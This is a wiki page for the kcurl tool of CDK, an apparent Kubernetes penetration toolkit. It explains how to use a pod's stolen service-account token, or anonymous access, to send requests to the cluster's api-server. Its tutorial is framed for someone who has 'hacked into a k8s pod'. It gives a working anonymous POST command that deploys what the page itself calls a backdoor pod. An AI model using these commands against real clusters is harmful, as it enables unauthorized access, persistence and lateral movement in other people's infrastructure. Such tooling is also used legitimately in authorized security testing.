Skip to content

Tool: kcurl

cdxy edited this page Jan 20, 2021 · 6 revisions

Connect K8s api-server with local service account token and make custom HTTP requests.

连接K8s api-server发起自定义HTTP请求。


help msg and usage:

./cdk kcurl

send request

cdk kcurl (default|anonymous|<service-account-token-path>) (get|post) <url> ["<post-data>"]

default: auth k8s api-server with pod's default service-account token
anonymous: auth k8s api-server with cluster-role "system:anonymous"
<token-path>: auth k8s api-server with user-specified service-account token path


Use K8s pod default service account token(saved in /var/run/secrets/ to list nodes.

cdk kcurl default get ""

Tutorial: create new pod using CDK kcurl command

Now you have hacked into a k8s pod and find k8s api-server endpoint, you want to run kubectl apply -f <file> to deploy a backdoor pod to cluster, but there's no kubectl in current pod.

You can use CDK kcurl command instead.

pod config ubuntu.yaml:

apiVersion: v1
kind: Pod
  name: cdxy-test-2021
  - image: ubuntu:latest 
    name: container

this is the pod you want to deploy, first you can run local kubectl to get JSON request params.

kubectl create -f ubuntu.yaml --edit -o json

Another way to translate any kubectl commands to JSON data is using --v param.
For example we dump request data in this case:

kubectl apply -f ubuntu.yaml --v=8

then you can find HTTP request URI and POST data in kubectl log:

wrap highlighted "URL" and "Data" string with single quote, then copy it to CDK kcurl command:

/cdk kcurl anonymous post '' '{"apiVersion":"v1","kind":"Pod","metadata":{"annotations":{"":"{\"apiVersion\":\"v1\",\"kind\":\"Pod\",\"metadata\":{\"annotations\":{},\"name\":\"cdxy-test-2021\",\"namespace\":\"default\"},\"spec\":{\"containers\":[{\"args\":[\"sleep\",\"infinity\"],\"image\":\"ubuntu:latest\",\"name\":\"container\"}]}}\n"},"name":"cdxy-test-2021","namespace":"default"},"spec":{"containers":[{"args":["sleep","infinity"],"image":"ubuntu:latest","name":"container"}]}}'

Now you can transfer kubectl apply requests to CDK kcurl command and manipulate K8s api-server in any pods.